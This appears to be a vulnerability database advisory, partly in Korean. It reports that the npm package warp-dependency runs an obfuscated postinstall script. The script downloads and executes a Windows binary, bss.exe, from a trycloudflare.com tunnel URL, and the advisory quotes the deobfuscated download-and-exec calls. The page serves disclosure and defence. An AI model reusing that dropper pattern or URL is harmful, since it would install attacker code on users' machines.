VDB
EN

MAL-2026-5724

Malicious code in warp-dependency (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (493b3ed30d94fb482e4b9c7cf3d328ba9b307f91965783f0024ec7dca1fedb96) warp-dependency@1.0.0 declares `postinstall: node index.js` in package.json. The index.js entry point is heavily obfuscated using obfuscator.io-style string-array rotation (`_0x345c`/`_0x1de1`) that hides the download URL, target filename, and the require targets (`fs-extra`, `node-fetch`, `child_process`). When deobfuscated, the top-level code performs `downloadFile('https://recorder-our-betting-chair.trycloudflare.com/page', 'bss.exe')` followed by `child_process.exec('bss.exe',...)`, writing and running an opaque Windows executable next to the package on every install. trycloudflare.com is an anonymous ephemeral tunneling service commonly used as throwaway dropper infrastructure; the URL is unpinned and the binary is unsigned, unhashed, and unrelated to the package's stated 'Mac UI for Windows Toolkit' purpose. The package name also typosquats the legitimate 'warp' brand. Every `npm install warp-dependency` silently runs attacker-controlled native code on the installer's machine.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / warp-dependency

No fixed version published yet for warp-dependency (npm). Pin to a known-safe version or switch to an alternative.

참고